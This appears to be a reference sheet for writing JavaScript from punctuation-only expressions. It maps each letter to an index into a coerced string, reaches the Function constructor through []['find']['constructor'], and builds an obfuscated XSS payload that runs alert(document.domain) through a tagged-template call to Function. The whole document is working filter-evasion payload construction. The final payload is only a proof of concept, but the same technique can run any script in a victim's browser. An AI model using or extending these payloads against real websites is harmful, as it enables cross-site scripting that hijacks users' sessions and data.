Basic:
"NaN"						=> []-{}+[]
"undefined"					=> [][[]]+[]
"[object Object]" 			=> []+{}
"Infinity"					=> 1e999+[]
"1e-7"						=> []+0.0000001
"[object HTMLProgressElement]"	=> e+[]

Tier 1:
"find" => [[][[]]+[]][0][4] + [[][[]]+[]][0][5] + [[][[]]+[]][0][1] + [[][[]]+[]][0][2]
"constructor" => [[]+{}][0][5] + [[]+{}][0][1] + [[][[]]+[]][0][1] + [e+[]][0][18] + [1e999+[]][0][6] + [e+[]][0][13] + [[][[]]+[]][0][0] + [[]+{}][0][5] + [1e999+[]][0][6] + [[]+{}][0][1] + [e+[]][0][13]

Function Constructor:
[]["find"]["constructor"] => [][[[][[]]+[]][0][4] + [[][[]]+[]][0][5] + [[][[]]+[]][0][1] + [[][[]]+[]][0][2]][[[]+{}][0][5] + [[]+{}][0][1] + [[][[]]+[]][0][1] + [e+[]][0][18] + [1e999+[]][0][6] + [e+[]][0][13] + [[][[]]+[]][0][0] + [[]+{}][0][5] + [1e999+[]][0][6] + [[]+{}][0][1] + [e+[]][0][13]]

a => [[]-{}+[]][0][1]
b => [[]+{}][0][2]
c => [[]+{}][0][5]
d => [[][[]]+[]][0][2]
e => [[][[]]+[]][0][3]
f => [[][[]]+[]][0][4]
g => [e+[]][0][13]
i => [[][[]]+[]][0][5]
j => [[]+{}][0][3]
l => [e+[]][0][21]
m => [e+[]][0][23]
n => [[][[]]+[]][0][1]
o => [[]+{}][0][1]
r => [e+[]][0][13]
s => [e+[]][0][18]
t => [1e999+[]][0][6]
u => [[][[]]+[]][0][0]
v => [[][[[][[]]+[]][0][4]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[[][[]]+[]][0][2]]+[]][0][23]
y => [1e999+[]][0][7]
( => [[][[[][[]]+[]][0][4]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[[][[]]+[]][0][2]]+[]][0][13]
) => [[][[[][[]]+[]][0][4]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[[][[]]+[]][0][2]]+[]][0][14]

alert(document.domain):
[[]-{}+[]][0][1] + [e+[]][0][21] + [[][[]]+[]][0][3] + [e+[]][0][13] + [1e999+[]][0][6] + [[][[[][[]]+[]][0][4]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[[][[]]+[]][0][2]]+[]][0][13] + [[][[]]+[]][0][2] + [[]+{}][0][1] + [[]+{}][0][5] + [[][[]]+[]][0][0] + [e+[]][0][23] + [[][[]]+[]][0][3] + [[][[]]+[]][0][1] + [1e999+[]][0][6] + `.` + [[][[]]+[]][0][2] + [[]+{}][0][1] + [e+[]][0][23] + [[]-{}+[]][0][1] + [[][[]]+[]][0][5] + [[][[]]+[]][0][1] + [[][[[][[]]+[]][0][4]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[[][[]]+[]][0][2]]+[]][0][14]

Function`e1${alert(document.domain)}e1```
[][[[][[]]+[]][0][4] + [[][[]]+[]][0][5] + [[][[]]+[]][0][1] + [[][[]]+[]][0][2]][[[]+{}][0][5] + [[]+{}][0][1] + [[][[]]+[]][0][1] + [e+[]][0][18] + [1e999+[]][0][6] + [e+[]][0][13] + [[][[]]+[]][0][0] + [[]+{}][0][5] + [1e999+[]][0][6] + [[]+{}][0][1] + [e+[]][0][13]]`e1${[[]-{}+[]][0][1] + [e+[]][0][21] + [[][[]]+[]][0][3] + [e+[]][0][13] + [1e999+[]][0][6] + [[][[[][[]]+[]][0][4]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[[][[]]+[]][0][2]]+[]][0][13] + [[][[]]+[]][0][2] + [[]+{}][0][1] + [[]+{}][0][5] + [[][[]]+[]][0][0] + [e+[]][0][23] + [[][[]]+[]][0][3] + [[][[]]+[]][0][1] + [1e999+[]][0][6] + `.` + [[][[]]+[]][0][2] + [[]+{}][0][1] + [e+[]][0][23] + [[]-{}+[]][0][1] + [[][[]]+[]][0][5] + [[][[]]+[]][0][1] + [[][[[][[]]+[]][0][4]+[[][[]]+[]][0][5]+[[][[]]+[]][0][1]+[[][[]]+[]][0][2]]+[]][0][14]}e1```

